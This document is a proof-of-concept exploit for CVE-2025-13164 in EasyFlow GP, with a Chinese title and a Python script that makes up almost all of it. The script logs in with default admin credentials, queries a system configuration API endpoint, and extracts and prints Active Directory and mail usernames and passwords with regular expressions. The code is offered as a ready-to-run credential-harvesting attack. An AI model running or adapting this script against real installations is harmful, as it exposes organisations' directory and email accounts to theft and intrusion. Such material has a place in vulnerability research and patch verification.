CVE-2025-13164 EasyFlow GP 凭证保护不足漏洞

# CVE-2025-13164 PoC - EasyFlow GP Credential Exposure # Description: EasyFlow GP exposes AD and mail credentials in plaintext via frontend import requests import re target_url = "http://target-easyflow-gp.com" # Step 1: Login as privileged user login_url = f"{target_url}/login" credentials = { "username": "admin", "password": "password" } session = requests.Session() response = session.post(login_url, data=credentials) # Step 2: Access admin page or API endpoint that exposes credentials admin_url = f"{target_url}/api/system/config" response = session.get(admin_url) # Step 3: Extract plaintext credentials from response if response.status_code == 200: # Look for credential patterns in response ad_creds = re.findall(r'ad_username[":\s]+([^,"}]+)', response.text) ad_passwords = re.findall(r'ad_password[":\s]+([^,"}]+)', response.text) mail_creds = re.findall(r'mail_username[":\s]+([^,"}]+)', response.text) mail_passwords = re.findall(r'mail_password[":\s]+([^,"}]+)', response.text) print("Exposed AD Credentials:") for u, p in zip(ad_creds, ad_passwords): print(f" Username: {u}, Password: {p}") print("Exposed Mail Credentials:") for u, p in zip(mail_creds, mail_passwords): print(f" Username: {u}, Password: {p}")